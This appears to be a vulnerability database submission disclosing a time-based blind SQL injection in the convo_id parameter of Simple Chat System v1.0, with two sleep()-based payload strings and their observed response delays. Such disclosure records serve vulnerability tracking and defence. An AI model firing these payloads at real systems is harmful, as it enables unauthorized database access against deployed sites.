| Title | Simple Chat System v1.0 /chat/ajax.php?action=read_msg POST parameter convo_id exists SQL injection vulnerability |
|---|
| Description | Simple Chat System v1.0 has SQL injection.
Vulnerability URL: /chat/ajax.php?action=read_msg
POST parameter convo_id exists SQL injection vulnerability.
Payload1: convo_id=1' and (select 2 from (select(sleep(10)))t) and 'q'='q&user_id=2
The response time is 10 seconds.
Payload2: convo_id=1' and (select 2 from (select(sleep(15)))t) and 'q'='q&user_id=2
The response time is 15 seconds. |
|---|
| Source | ⚠️ https://github.com/sikii7/CVE/blob/main/SQL.md |
|---|
| User | sikii (UID 47840) |
|---|
| Submission | 05/31/2023 08:39 (3 years ago) |
|---|
| Moderation | 05/31/2023 10:00 (1 hour later) |
|---|
| Status | Accepted |
|---|
| VulDB entry | 230348 [SourceCodester Simple Chat System 1.0 POST Parameter ajax.php?action=read_msg convo_id sql injection] |
|---|
| Points | 20 |
|---|